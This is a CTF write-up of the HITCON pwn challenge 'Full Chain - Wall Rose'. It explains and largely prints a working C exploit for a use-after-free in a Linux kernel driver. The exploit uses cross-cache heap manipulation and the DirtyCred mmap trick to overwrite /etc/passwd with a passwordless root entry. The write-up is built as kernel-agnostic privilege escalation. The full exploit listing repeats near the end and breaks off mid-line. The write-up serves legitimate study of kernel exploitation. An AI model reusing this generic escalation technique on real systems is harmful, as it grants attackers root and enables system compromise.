Last week, I spent my weekend working on the HITCON CTF challenge named “Full Chain - Wall Rose”. I was part of the Blue Water team, and we managed to get the first place in the qualifiers, earning a spot in the finals.
Below is the writeup of one of the pwn challenges called “Full Chain - Wall Rose”.
Pwn
Full Chain - Wall Rose
Description
Challenge:
You have a busybox shell running as user user
/home/user/rose.ko is a vulnerable kernel driver
Try exploiting /home/user/rose.ko to achieve privilege escalation
You may assumed that Busybox, the Linux kernel, and Qemu are not vulnerable.
Notes:
FG-KASLR is enabled
Your exploit should be kernel-agnostic. In other words, it should not rely on any kernel offsets
Author: wxrdnx
Initial Analysis
In this challenge, we were provided with the source code of a vulnerable kernel driver named rose.c to analyze. Here’s the source code:
#include<linux/atomic.h>#include<linux/device.h>#include<linux/fs.h>#include<linux/init.h>#include<linux/kernel.h>#include<linux/miscdevice.h>#include<linux/module.h>#include<linux/slab.h>#include<linux/uaccess.h>#include<asm/errno.h>#include<linux/printk.h>#define MAX_DATA_HEIGHT 0x400
MODULE_AUTHOR("wxrdnx");MODULE_LICENSE("GPL");MODULE_DESCRIPTION("Wall Rose");staticchar*data;staticintrose_open(structinode*inode,structfile*file){data=kmalloc(MAX_DATA_HEIGHT,GFP_KERNEL);if(!data){printk(KERN_ERR"Wall Rose: kmalloc error\n");return-1;}memset(data,0,MAX_DATA_HEIGHT);return0;}staticintrose_release(structinode*inode,structfile*file){kfree(data);return0;}staticssize_trose_read(structfile*filp,char__user*buffer,size_tlength,loff_t*offset){pr_info("Wall Rose: data dropped");return0;}staticssize_trose_write(structfile*filp,constchar__user*buffer,size_tlength,loff_t*offset){pr_info("Wall Rose: data dropped");return0;}staticstructfile_operationsrose_fops={.owner=THIS_MODULE,.open=rose_open,.release=rose_release,.read=rose_read,.write=rose_write,};staticstructmiscdevicerose_device={.minor=MISC_DYNAMIC_MINOR,.name="rose",.fops=&rose_fops,};staticint__initrose_init(void){returnmisc_register(&rose_device);}staticvoid__exitrose_exit(void){misc_deregister(&rose_device);}module_init(rose_init);module_exit(rose_exit);
We discovered that our interactions with the driver were limited to open and close operations. The bug we identified was rather straightforward. If we opened a multiple of file descriptors to the driver, they all shared the same data chunk. This allowed us to execute multiple kfree operations on the stored data by closing the previously opened file descriptors, indicating a Use-After-Free (UAF) condition.
However, we were unable to perform read and write operations. Given this constraint, our next step was to craft a strategy for successful exploitation.
Solution
I worked on this challenge alongside two of my teammates, sampriti and cru5h. This challenge forms a part of the full chain challenge. The challenge notes encouraged us to develop an exploit that was kernel-agnostic, taking into consideration the presence of FG-KASLR as well. Thus, we set out to devise an exploit stable enough for future use.
Given the UAF scenario, we opted to explore cross-cache exploitation, which seemed promising since we would not require a leak later on, and it promised to be kernel-agnostic as well.
The bug identified was a UAF in kmalloc-1k. We resolved to pursue cross-cache exploitation, allowing the chunk to be utilized by other objects of varying sizes. We targeted the file structure, planning to later trigger the DirtyCred technique.
Analyzing last year’s writeup along with the CVE-2022-29582 writeup greatly enhanced my grasp of the exploitation techniques involved. These resources, particularly new to me, offered clear guidance on navigating the page allocator and included a practical abstraction for initiating cross-cache exploitation. I would strongly recommend reviewing these write-ups to gain a deeper comprehension of it.
To offer some background, the Linux kernel features a slab allocator named SLUB that manages the caches of kernel heap objects. Each slab is designated to manage objects of a uniform size. During slab allocation, the kernel utilizes pages. The necessity to trigger a cross-cache arises due to the specific attributes of the file object:
It has a size of 256.
It is housed in a dedicated cache named filp.
The UAF vulnerability that we had were located in kmalloc-1k, and the file struct has its own dedicated cache. Therefore, even if we have a UAF vulnerability with the same size as the file struct, we still need to initiate a cross-cache attack, since rose objects are allocated in the general cache.
Now that we have this knowledge, as outlined in the aforementioned writeup, the initial step is to discard a slab that houses our rose object. The procedure to accomplish this is clearly explained in Ruia’s writeup. The first task is to determine the values of OBJS_PER_SLAB and CPU_PARTIAL for kmalloc-1k. To verify these values, we can execute the following commands:
cat /sys/kernel/slab/kmalloc-1k/objs_per_slab
cat /sys/kernel/slab/kmalloc-1k/cpu_partial
Now, let’s start crafting the exploit. We adapted the abstraction provided in last year’s writeup to trigger the cross-cache.
//gcc -pthread -no-pie -static ../../exploit.c -o exp
#define _GNU_SOURCE
#include<assert.h>#include<fcntl.h>#include<errno.h>#include<inttypes.h>#include<limits.h>#include<pthread.h>#include<signal.h>#include<stdbool.h>#include<stddef.h>#include<stdint.h>#include<stdio.h>#include<stdlib.h>#include<poll.h>#include<stdnoreturn.h>#include<string.h>#include<unistd.h>#include<linux/userfaultfd.h>#include<sys/ioctl.h>#include<sys/ipc.h>#include<sys/mman.h>#include<sys/msg.h>#include<sys/stat.h>#include<sys/syscall.h>#include<sys/timerfd.h>#include<sys/wait.h>#include<sys/types.h>#include<sys/resource.h>#include<linux/capability.h>#include<sys/xattr.h>#include<linux/io_uring.h>#include<linux/membarrier.h>#include<linux/io_uring.h>#include<linux/membarrier.h>#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define CC_OVERFLOW_FACTOR 5 // Used to handle fragmentation
#define OBJS_PER_SLAB 8 // Fetch this from /sys/kernel/slab/kmalloc-1k/objs_per_slab
#define CPU_PARTIAL 24 // Fetch this from /sys/kernel/slab/kmalloc-1k/cpu_partial
#define MSG_SIZE 0x400-48 // kmalloc-1k (because CONFIG_MEMCG_KMEM is disabled, we can use msg_msg)
staticnoreturnvoidfatal(constchar*msg){perror(msg);exit(EXIT_FAILURE);}/*
Cross-cache abstraction taken from https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
Notes that here is minor adjustments that we made to the abstraction
*/enum{CC_RESERVE_PARTIAL_LIST=0,CC_ALLOC_VICTIM_PAGE,CC_FILL_VICTIM_PAGE,CC_EMPTY_VICTIM_PAGE,CC_OVERFLOW_PARTIAL_LIST};structcross_cache{uint32_tobjs_per_slab;uint32_tcpu_partial;struct{int64_t*overflow_objs;int64_t*pre_victim_objs;int64_t*post_victim_objs;};uint8_tphase;int(*allocate)(int64_t);int(*free)(int64_t);};staticstructcross_cache*kmalloc1k_cc;staticinlineint64_tcc_allocate(structcross_cache*cc,int64_t*repo,uint32_tto_alloc){for(uint32_ti=0;i<to_alloc;i++){int64_tref=cc->allocate(i);if(ref==-1)return-1;repo[i]=ref;}return0;}staticinlineint64_tcc_free(structcross_cache*cc,int64_t*repo,uint32_tto_free,boolper_slab){for(uint32_ti=0;i<to_free;i++){// if per_slab is true, The target is to free one object per slab.
if(per_slab&&(i%(cc->objs_per_slab-1)))continue;if(repo[i]==-1)continue;cc->free(repo[i]);repo[i]=-1;}return0;}staticinlineint64_treserve_partial_list_amount(structcross_cache*cc){uint32_tto_alloc=cc->objs_per_slab*(cc->cpu_partial+1)*CC_OVERFLOW_FACTOR;cc_allocate(cc,cc->overflow_objs,to_alloc);return0;}staticinlineint64_tallocate_victim_page(structcross_cache*cc){uint32_tto_alloc=cc->objs_per_slab-1;cc_allocate(cc,cc->pre_victim_objs,to_alloc);return0;}staticinlineint64_tfill_victim_page(structcross_cache*cc){uint32_tto_alloc=cc->objs_per_slab+1;cc_allocate(cc,cc->post_victim_objs,to_alloc);return0;}staticinlineint64_tempty_victim_page(structcross_cache*cc){uint32_tto_free=cc->objs_per_slab-1;cc_free(cc,cc->pre_victim_objs,to_free,false);to_free=cc->objs_per_slab+1;cc_free(cc,cc->post_victim_objs,to_free,false);return0;}staticinlineint64_toverflow_partial_list(structcross_cache*cc){uint32_tto_free=cc->objs_per_slab*(cc->cpu_partial+1)*CC_OVERFLOW_FACTOR;cc_free(cc,cc->overflow_objs,to_free,true);return0;}staticinlineint64_tfree_all(structcross_cache*cc){uint32_tto_free=cc->objs_per_slab*(cc->cpu_partial+1)*CC_OVERFLOW_FACTOR;cc_free(cc,cc->overflow_objs,to_free,false);empty_victim_page(cc);return0;}int64_tcc_next(structcross_cache*cc){switch(cc->phase++){caseCC_RESERVE_PARTIAL_LIST:returnreserve_partial_list_amount(cc);caseCC_ALLOC_VICTIM_PAGE:returnallocate_victim_page(cc);caseCC_FILL_VICTIM_PAGE:returnfill_victim_page(cc);caseCC_EMPTY_VICTIM_PAGE:returnempty_victim_page(cc);caseCC_OVERFLOW_PARTIAL_LIST:returnoverflow_partial_list(cc);default:return0;}}voidcc_deinit(structcross_cache*cc){free_all(cc);free(cc->overflow_objs);free(cc->pre_victim_objs);free(cc->post_victim_objs);free(cc);}voidinit_msq(int64_t*repo,uint32_tto_alloc){for(inti=0;i<to_alloc;i++){repo[i]=msgget(IPC_PRIVATE,IPC_CREAT|0666);if(repo[i]<0){logd("[-] msgget() fail\n");exit(-1);}}}structcross_cache*cc_init(uint32_tobjs_per_slab,uint32_tcpu_partial,void*allocate_fptr,void*free_fptr){structcross_cache*cc=malloc(sizeof(structcross_cache));if(!cc){perror("init_cross_cache:malloc\n");returnNULL;}cc->objs_per_slab=objs_per_slab;cc->cpu_partial=cpu_partial;cc->free=free_fptr;cc->allocate=allocate_fptr;cc->phase=CC_RESERVE_PARTIAL_LIST;uint32_tn_overflow=objs_per_slab*(cpu_partial+1)*CC_OVERFLOW_FACTOR;uint32_tn_previctim=objs_per_slab-1;uint32_tn_postvictim=objs_per_slab+1;cc->overflow_objs=malloc(sizeof(int64_t)*n_overflow);cc->pre_victim_objs=malloc(sizeof(int64_t)*n_previctim);cc->post_victim_objs=malloc(sizeof(int64_t)*n_postvictim);init_msq(cc->overflow_objs,n_overflow);init_msq(cc->pre_victim_objs,n_previctim);init_msq(cc->post_victim_objs,n_postvictim);returncc;}staticintrlimit_increase(intrlimit){structrlimitr;if(getrlimit(rlimit,&r))fatal("rlimit_increase:getrlimit");if(r.rlim_max<=r.rlim_cur){printf("[+] rlimit %d remains at %.lld",rlimit,r.rlim_cur);return0;}r.rlim_cur=r.rlim_max;intres;if(res=setrlimit(rlimit,&r))fatal("rlimit_increase:setrlimit");elseprintf("[+] rlimit %d increased to %lld\n",rlimit,r.rlim_max);returnres;}staticint64_tcc_alloc_kmalloc1k_msg(int64_tmsqid){struct{longmtype;charmtext[MSG_SIZE];}msg;msg.mtype=1;memset(msg.mtext,0x41,MSG_SIZE-1);msg.mtext[MSG_SIZE-1]=0;msgsnd(msqid,&msg,sizeof(msg.mtext),0);returnmsqid;}staticvoidcc_free_kmalloc1k_msg(int64_tmsqid){struct{longmtype;charmtext[MSG_SIZE];}msg;msg.mtype=0;msgrcv(msqid,&msg,sizeof(msg.mtext),0,IPC_NOWAIT|MSG_NOERROR);}intopen_rose(){returnopen("/dev/rose",O_RDWR);}
Above is the modified version of the script we used. We made a couple of adjustments from the original script, including:
In the cc_free section, we made it so that when per_slab is flagged as true, it only frees one object per slab.
For the object spray, since the kernel setting CONFIG_MEMCG_KMEM is turned off, we can use msg_msg objects in kmalloc-1k for this. (Just a note, if this setting were enabled, msg_msg wouldn’t be in the same cache area as rose, so we’d need to find a different object to spray it).
Now that we’ve identified the specifics regarding the number of objects required to fill a slab and the count of slabs necessary to fill the CPU partial list, it’s time to initiate the discard slab process. Taking a cue from the guidelines in the write-up, here is what we need to do to trigger a discard_slab:
Start by allocating a significant number of slabs, exceeding the upper limit defined by CPU_PARTIAL.
Then, focus on the target slab we aim to discard. Ensure to allocate it without filling it completely, leaving room to allocate the rose object later.
Next, allocate the rose object, which, ideally, should find a place in the slab we prepared in the previous step.
Moving forward, fill up the target slab until it’s full, activating a new slab in the process.
The next move is to empty our target slab. This involves releasing the rose object along with others that are housed within the slab.
Now, with an empty target slab at hand, we free up at least one object from the other slabs that are not active at the moment.
The objective here is to max out the partial list, a condition met when it holds CPU_PARTIAL number of slabs.
Presuming the partial list is filled to capacity, freeing an additional object from a non-active slab (also not part of the partial list) activates unfreeze_partials.
This function scans through the slabs in the partial list, discarding any that are found empty.
Bear in mind that we emptied our chosen slab (slab of the rose object) earlier. This means that during the above step, our slab gets discarded, making its way to the freelist.
To put this all into action, we’ll use the abstraction we described earlier. Here’s how the code looks:
introse_fds[2];intfreed_fd=-1;#define NUM_SPRAY_FDS 0x300
intmain(void){puts("=======================");puts("[+] Initial setup");system("echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > /tmp/a");rlimit_increase(RLIMIT_NOFILE);// Alloc the first rose
// This will be used later to trigger double free
rose_fds[0]=open_rose();puts("=======================");puts("[+] Try to free the page");// Based on https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
kmalloc1k_cc=cc_init(OBJS_PER_SLAB,CPU_PARTIAL,cc_alloc_kmalloc1k_msg,cc_free_kmalloc1k_msg);// Step 1
puts("[+] Step 1: Allocate a lot of slabs (To be put in the partial list later)");cc_next(kmalloc1k_cc);// Step 2
puts("[+] Step 2: Allocate target slab that we want to discard");cc_next(kmalloc1k_cc);// Step 3
puts("[+] Step 3: Put rose in the target slab");rose_fds[1]=open_rose();// Step 4
puts("[+] Step 4: Fulfill the target slab until we have a new active slab");cc_next(kmalloc1k_cc);// Step 5
puts("[+] Step 5: Try to free rose & other objects with hope that the target slab will be empty + be put in the partial list");// Free rose, but rose_fds[0] also pointing to the same chunk,
// and we can use rose_fds[0] later to free other chunk that resides in here
close(rose_fds[1]);cc_next(kmalloc1k_cc);// Step 6
puts("[+] Step 6: Fulfill the partial list and discard the target slab (because it's empty) to per_cpu_pages");cc_next(kmalloc1k_cc);}
Some extra notes:
We’ve created a file called /tmp/a, which we plan to use later to trigger the DirtyCred technique.
Importantly, we initiate the allocation of the rose object prior to setting the cross-cache process. We want to have two file descriptors pointing to the same chunk, with hope that it will help us to invoke a double free scenario later on.
Following the execution of the script outlined above, theoretically, the targeted slab should have been discarded and will reside in the freelist zone. To debug this, I just set a breakpoint in both rose_release and discard_slab to get the data address and to confirm if the discard_slab is indeed trying to discard the slab of the rose data.
However, during the competition, I failed to spray the file objects in our previously discarded slab’s page (the page wasn’t recycled somehow). I tried to check the /proc/slabinfo, where I discovered a new info, that the kmalloc-1k page was at order 1, while the file object (256-byte) was placed at page order 0.
Initially, checking on another writeup on Page-level heap fengshui, I presumed that an empty page order 0 freelist would resort to use the higher-order freelist, which in this case, was our discarded page. Although this was accurate, I overlooked a crucial step.
My teammate, cru5h, highlighted that the page we released earlier was still resided in the per_cpu_pages (pcp) freelist. He said that I needed to release the page once more to transfer it to the buddy system’s free area. In the buddy, when a lower order page’s free area is empty, it will try to use the freelist of a higher-order page (which is exactly the outcome we were aiming for). He helped me in this part and provided me a working script which has made the free page back to the buddy system.
On a side note, I try to deep dive into the Linux kernel’s code while trying to discard a slab, which helps me a lot to understand on this issue.
staticvoiddiscard_slab(structkmem_cache*s,structslab*slab){...free_slab(s,slab);}staticvoidfree_slab(structkmem_cache*s,structslab*slab){...__free_slab(s,slab);}staticvoid__free_slab(structkmem_cache*s,structslab*slab){structfolio*folio=slab_folio(slab);intorder=folio_order(folio);intpages=1<<order;...__free_pages(folio_page(folio,0),order);}void__free_pages(structpage*page,unsignedintorder){/* get PageHead before we drop reference */inthead=PageHead(page);if(put_page_testzero(page))free_the_page(page,order);elseif(!head)while(order-->0)free_the_page(page+(1<<order),order);}staticinlinevoidfree_the_page(structpage*page,unsignedintorder){if(pcp_allowed_order(order))/* Via pcp? */free_unref_page(page,order);else__free_pages_ok(page,order,FPI_NONE);}voidfree_unref_page(structpage*page,unsignedintorder){...pcp=pcp_spin_trylock_irqsave(zone->per_cpu_pageset,flags);if(pcp){free_unref_page_commit(zone,pcp,page,migratetype,order);pcp_spin_unlock_irqrestore(pcp,flags);}else{free_one_page(zone,page,pfn,order,migratetype,FPI_NONE);}pcp_trylock_finish(UP_flags);}staticvoidfree_unref_page_commit(structzone*zone,structper_cpu_pages*pcp,structpage*page,intmigratetype,unsignedintorder){inthigh;intpindex;boolfree_high;__count_vm_events(PGFREE,1<<order);pindex=order_to_pindex(migratetype,order);list_add(&page->pcp_list,&pcp->lists[pindex]);pcp->count+=1<<order;/*
* As high-order pages other than THP's stored on PCP can contribute
* to fragmentation, limit the number stored when PCP is heavily
* freeing without allocation. The remainder after bulk freeing
* stops will be drained from vmstat refresh context.
*/free_high=(pcp->free_factor&&order&&order<=PAGE_ALLOC_COSTLY_ORDER);high=nr_pcp_high(pcp,zone,free_high);if(pcp->count>=high){intbatch=READ_ONCE(pcp->batch);free_pcppages_bulk(zone,nr_pcp_free(pcp,high,batch,free_high),pcp,pindex);}}staticvoidfree_pcppages_bulk(structzone*zone,intcount,structper_cpu_pages*pcp,intpindex){...__free_one_page(page,page_to_pfn(page),zone,order,mt,FPI_NONE);...}/*
* Freeing function for a buddy system allocator.
*
*/staticinlinevoid__free_one_page(structpage*page,unsignedlongpfn,structzone*zone,unsignedintorder,intmigratetype,fpi_tfpi_flags){...}
When you get rid of a slab, it activates the discard_slab function, which then triggers the free_unref_page_commit function. This function then adds the freed page to a list called pcp_list. It’s important to note that if the count of pages in this list goes beyond a certain number, these pages are moved back to the buddy system’s free area.
Additionally, I’d like to highlight the importance of returning the freed page back to the buddy system’s free area. This is necessary because, at some stage during the slab allocation process, the get_page_from_freelist function will be invoked.
staticstructpage*get_page_from_freelist(gfp_tgfp_mask,unsignedintorder,intalloc_flags,conststructalloc_context*ac){...try_this_zone:page=rmqueue(ac->preferred_zoneref->zone,zone,order,gfp_mask,alloc_flags,ac->migratetype);if(page){prep_new_page(page,order,gfp_mask,alloc_flags);...}/*
* Allocate a page from the given zone.
* Use pcplists for THP or "cheap" high-order allocations.
*//*
* Do not instrument rmqueue() with KMSAN. This function may call
* __msan_poison_alloca() through a call to set_pfnblock_flags_mask().
* If __msan_poison_alloca() attempts to allocate pages for the stack depot, it
* may call rmqueue() again, which will result in a deadlock.
*/__no_sanitize_memorystaticinlinestructpage*rmqueue(structzone*preferred_zone,structzone*zone,unsignedintorder,gfp_tgfp_flags,unsignedintalloc_flags,intmigratetype){structpage*page;...if(likely(pcp_allowed_order(order))){/*
* MIGRATE_MOVABLE pcplist could have the pages on CMA area and
* we need to skip it when CMA area isn't allowed.
*/if(!IS_ENABLED(CONFIG_CMA)||alloc_flags&ALLOC_CMA||migratetype!=MIGRATE_MOVABLE){page=rmqueue_pcplist(preferred_zone,zone,order,migratetype,alloc_flags);if(likely(page))gotoout;}}page=rmqueue_buddy(preferred_zone,zone,order,alloc_flags,migratetype);...returnpage;}/* Lock and remove page from the per-cpu list */staticstructpage*rmqueue_pcplist(structzone*preferred_zone,structzone*zone,unsignedintorder,intmigratetype,unsignedintalloc_flags){...list=&pcp->lists[order_to_pindex(migratetype,order)];page=__rmqueue_pcplist(zone,order,migratetype,alloc_flags,pcp,list);...}static__always_inlinestructpage*rmqueue_buddy(structzone*preferred_zone,structzone*zone,unsignedintorder,unsignedintalloc_flags,intmigratetype){...if(order>0&&alloc_flags&ALLOC_HARDER)page=__rmqueue_smallest(zone,order,MIGRATE_HIGHATOMIC);...}static__always_inlinestructpage*__rmqueue_smallest(structzone*zone,unsignedintorder,intmigratetype){.../* Find a page of the appropriate size in the preferred list */for(current_order=order;current_order<MAX_ORDER;++current_order){area=&(zone->free_area[current_order]);page=get_page_from_free_area(area,migratetype);...returnpage;}...}
Observed that the system first attempts to retrieve a page from the pcp freelist, before moving on to fetch a page from the buddy system’s free area. Inside rmqueue_pcplist, the list is accessed based on its order, while rmqueue_buddy (which eventually calls __rmqueue_smallest) iterates through each freelist from the requested order up to MAX_ORDER. Hence, from what I understand, when we are trying to allocate a new page with order 0 utilizing the pcp_list, it doesn’t check the freelist of higher orders. This is why we need to make sure that the previously discarded slab is moved back to the buddy system first.
How do we achieve this? As mentioned earlier, we can fill up the pcp_list which would prompt the free_unref_page_commit function to release the pages back into the buddy system.
To initiate this, we can add an extra step where we simply release all the objects we previously sprayed, with the expectation that this will fill up the pcp_list and allow our page to be released back into the buddy system.
1
2
3
4
5
6
7
// Step 7
puts("[+] Step 7: Make PCP freelist full, so that page goes to free area in buddy");cc_deinit(kmalloc1k_cc);// We try to make the page stored in pcp goes to free area by making
// the pcp freelist full.
// Free all allocation that we've made before to trigger it, and after that
// We can start our cross-cach exploitation.
Now that we’ve managed to return the page to the buddy system, it’s time to trigger the DirtyCred technique. We plan to use a strategy we learned from n0psledbyte during the zer0pts CTF. He demonstrated an easier method using mmap instead of a race condition in the write syscall to achieve this.
To revisit our current situation, we have one rose file descriptor (FD) that is linked to a chunk located in the free page. Next, we intend to create numerous file objects, with hope that a new slab will be assigned using the free page, so that one of the newly generated file objects will overlap with the chunk addressed by our remaining rose FD. Let’s proceed to execute this spray strategy.
1
2
3
4
5
6
7
8
9
10
11
puts("=======================");puts("[+] Start the main exploit");// Trigger cross-cache, file will use the freed page
puts("[+] Spray FDs");intspray_fds[NUM_SPRAY_FDS];for(inti=0;i<NUM_SPRAY_FDS;i++){spray_fds[i]=open("/tmp/a",O_RDWR);// /tmp/a is a writable file
if(spray_fds[i]==-1)fatal("Failed to open FDs");}
Note that the size of a file object is 256 bytes, which can be evenly divided by the size of the rose object, which is 1024 bytes. This ensures that if a new slab for the file objects is created using our freed page, at least one file object will perfectly overlap with our dangling rose object, starting from the same address.
After the spraying process, we can attempt to close the existing rose FD, so that it will release one of the files we just sprayed. Next, to determine which index of spray_fds corresponds to the same chunk as the rose FD, we can spray additional file descriptors. We hope that one of the newly sprayed files will reuse the chunk we just released through rose.
1
2
3
4
5
6
7
8
9
// Spray to replace the previously freed chunk
// Set the lseek to 0x8, so that we can find easily the fd
puts("[+] Find the freed FD using lseek");intspray_fds_2[NUM_SPRAY_FDS];for(inti=0;i<NUM_SPRAY_FDS;i++){spray_fds_2[i]=open("/tmp/a",O_RDWR);lseek(spray_fds_2[i],0x8,SEEK_SET);}// After: 2 fd 1 refcount (Because new file)
Note that we use lseek on spray_fds_2 by 0x8 to help us in identifying the correct index of the spray_fds that we just released using rose. Let’s proceed to locate it.
1
2
3
4
5
6
7
8
9
10
11
// The freed fd will have lseek value set to 0x8. Try to find it.
for(inti=0;i<NUM_SPRAY_FDS;i++){if(lseek(spray_fds[i],0,SEEK_CUR)==0x8){freed_fd=spray_fds[i];lseek(freed_fd,0x0,SEEK_SET);printf("[+] Found freed fd: %d\n",freed_fd);break;}}if(freed_fd==-1)fatal("Failed to find FD");
If we manage to identify it, it means that the cross-cache operations have been successfully completed. To trigger the DirtyCred, we simply need to call mmap on the freed_fd, then close it, followed by closing all instances of spray_fds_2.
// mmap trick instead of race with write
puts("[+] DirtyCred via mmap");char*file_mmap=mmap(NULL,0x1000,PROT_READ|PROT_WRITE,MAP_SHARED,freed_fd,0);// After: 3 fd 2 refcount (Because new file)
close(freed_fd);// After: 2 fd 1 refcount (Because new file)
for(inti=0;i<NUM_SPRAY_FDS;i++){close(spray_fds_2[i]);}// After: 1 fd 0 refcount (Because new file)
// Effect: FD in mmap (which is writeable) can be replaced with RDONLY file
for(inti=0;i<NUM_SPRAY_FDS;i++){spray_fds[i]=open("/etc/passwd",O_RDONLY);}// After: 2 fd 1 refcount (but writeable due to mmap)
strcpy(file_mmap,"root::0:0:root:/root:/bin/sh\n");
At this point, due to the UAF, the file object’s refcount will reduce to zero after closing spray_fds_2, causing it to be released, yet the mmap still has an open FD linked to that released chunk.
As a final step, we spray once more using the read-only file /etc/passwd, hoping that one of the newly sprayed files will occupy the chunk that is now addressed by mmap. Given that mmap was initiated with write permissions, we can modify the contents of the chunk pointed to by mmap, despite it having read-only access initially. Overwriting the /etc/passwd will allow us to get privilege escalation :).
//gcc -pthread -no-pie -static ../../exploit.c -o exp
#define _GNU_SOURCE
#include<assert.h>#include<fcntl.h>#include<errno.h>#include<inttypes.h>#include<limits.h>#include<pthread.h>#include<signal.h>#include<stdbool.h>#include<stddef.h>#include<stdint.h>#include<stdio.h>#include<stdlib.h>#include<poll.h>#include<stdnoreturn.h>#include<string.h>#include<unistd.h>#include<linux/userfaultfd.h>#include<sys/ioctl.h>#include<sys/ipc.h>#include<sys/mman.h>#include<sys/msg.h>#include<sys/stat.h>#include<sys/syscall.h>#include<sys/timerfd.h>#include<sys/wait.h>#include<sys/types.h>#include<sys/resource.h>#include<linux/capability.h>#include<sys/xattr.h>#include<linux/io_uring.h>#include<linux/membarrier.h>#include<linux/io_uring.h>#include<linux/membarrier.h>#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define CC_OVERFLOW_FACTOR 5 // Used to handle fragmentation
#define OBJS_PER_SLAB 8 // Fetch this from /sys/kernel/slab/kmalloc-1k/objs_per_slab
#define CPU_PARTIAL 24 // Fetch this from /sys/kernel/slab/kmalloc-1k/cpu_partial
#define MSG_SIZE 0x400-48 // kmalloc-1k (because CONFIG_MEMCG_KMEM is disabled, we can use msg_msg)
staticnoreturnvoidfatal(constchar*msg){perror(msg);exit(EXIT_FAILURE);}/*
Cross-cache abstraction taken from https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
Notes that here is minor adjustments that we made to the abstraction
*/enum{CC_RESERVE_PARTIAL_LIST=0,CC_ALLOC_VICTIM_PAGE,CC_FILL_VICTIM_PAGE,CC_EMPTY_VICTIM_PAGE,CC_OVERFLOW_PARTIAL_LIST};structcross_cache{uint32_tobjs_per_slab;uint32_tcpu_partial;struct{int64_t*overflow_objs;int64_t*pre_victim_objs;int64_t*post_victim_objs;};uint8_tphase;int(*allocate)(int64_t);int(*free)(int64_t);};staticstructcross_cache*kmalloc1k_cc;staticinlineint64_tcc_allocate(structcross_cache*cc,int64_t*repo,uint32_tto_alloc){for(uint32_ti=0;i<to_alloc;i++){int64_tref=cc->allocate(i);if(ref==-1)return-1;repo[i]=ref;}return0;}staticinlineint64_tcc_free(structcross_cache*cc,int64_t*repo,uint32_tto_free,boolper_slab){for(uint32_ti=0;i<to_free;i++){// if per_slab is true, The target is to free one object per slab.
if(per_slab&&(i%(cc->objs_per_slab-1)))continue;if(repo[i]==-1)continue;cc->free(repo[i]);repo[i]=-1;}return0;}staticinlineint64_treserve_partial_list_amount(structcross_cache*cc){uint32_tto_alloc=cc->objs_per_slab*(cc->cpu_partial+1)*CC_OVERFLOW_FACTOR;cc_allocate(cc,cc->overflow_objs,to_alloc);return0;}staticinlineint64_tallocate_victim_page(structcross_cache*cc){uint32_tto_alloc=cc->objs_per_slab-1;cc_allocate(cc,cc->pre_victim_objs,to_alloc);return0;}staticinlineint64_tfill_victim_page(structcross_cache*cc){uint32_tto_alloc=cc->objs_per_slab+1;cc_allocate(cc,cc->post_victim_objs,to_alloc);return0;}staticinlineint64_tempty_victim_page(structcross_cache*cc){uint32_tto_free=cc->objs_per_slab-1;cc_free(cc,cc->pre_victim_objs,to_free,false);to_free=cc->objs_per_slab+1;cc_free(cc,cc->post_victim_objs,to_free,false);return0;}staticinlineint64_toverflow_partial_list(structcross_cache*cc){uint32_tto_free=cc->objs_per_slab*(cc->cpu_partial+1)*CC_OVERFLOW_FACTOR;cc_free(cc,cc->overflow_objs,to_free,true);return0;}staticinlineint64_tfree_all(structcross_cache*cc){uint32_tto_free=cc->objs_per_slab*(cc->cpu_partial+1)*CC_OVERFLOW_FACTOR;cc_free(cc,cc->overflow_objs,to_free,false);empty_victim_page(cc);return0;}int64_tcc_next(structcross_cache*cc){switch(cc->phase++){caseCC_RESERVE_PARTIAL_LIST:returnreserve_partial_list_amount(cc);caseCC_ALLOC_VICTIM_PAGE:returnallocate_victim_page(cc);caseCC_FILL_VICTIM_PAGE:returnfill_victim_page(cc);caseCC_EMPTY_VICTIM_PAGE:returnempty_victim_page(cc);caseCC_OVERFLOW_PARTIAL_LIST:returnoverflow_partial_list(cc);default:return0;}}voidcc_deinit(structcross_cache*cc){free_all(cc);free(cc->overflow_objs);free(cc->pre_victim_objs);free(cc->post_victim_objs);free(cc);}voidinit_msq(int64_t*repo,uint32_tto_alloc){for(inti=0;i<to_alloc;i++){repo[i]=msgget(IPC_PRIVATE,IPC_CREAT|0666);if(repo[i]<0){logd("[-] msgget() fail\n");exit(-1);}}}structcross_cache*cc_init(uint32_tobjs_per_slab,uint32_tcpu_partial,void*allocate_fptr,void*free_fptr){structcross_cache*cc=malloc(sizeof(structcross_cache));if(!cc){perror("init_cross_cache:malloc\n");returnNULL;}cc->objs_per_slab=objs_per_slab;cc->cpu_partial=cpu_partial;cc->free=free_fptr;cc->allocate=allocate_fptr;cc->phase=CC_RESERVE_PARTIAL_LIST;uint32_tn_overflow=objs_per_slab*(cpu_partial+1)*CC_OVERFLOW_FACTOR;uint32_tn_previctim=objs_per_slab-1;uint32_tn_postvictim=objs_per_slab+1;cc->overflow_objs=malloc(sizeof(int64_t)*n_overflow);cc->pre_victim_objs=malloc(sizeof(int64_t)*n_previctim);cc->post_victim_objs=malloc(sizeof(int64_t)*n_postvictim);init_msq(cc->overflow_objs,n_overflow);init_msq(cc->pre_victim_objs,n_previctim);init_msq(cc->post_victim_objs,n_postvictim);returncc;}staticintrlimit_increase(intrlimit){structrlimitr;if(getrlimit(rlimit,&r))fatal("rlimit_increase:getrlimit");if(r.rlim_max<=r.rlim_cur){printf("[+] rlimit %d remains at %.lld",rlimit,r.rlim_cur);return0;}r.rlim_cur=r.rlim_max;intres;if(res=setrlimit(rlimit,&r))fatal("rlimit_increase:setrlimit");elseprintf("[+] rlimit %d increased to 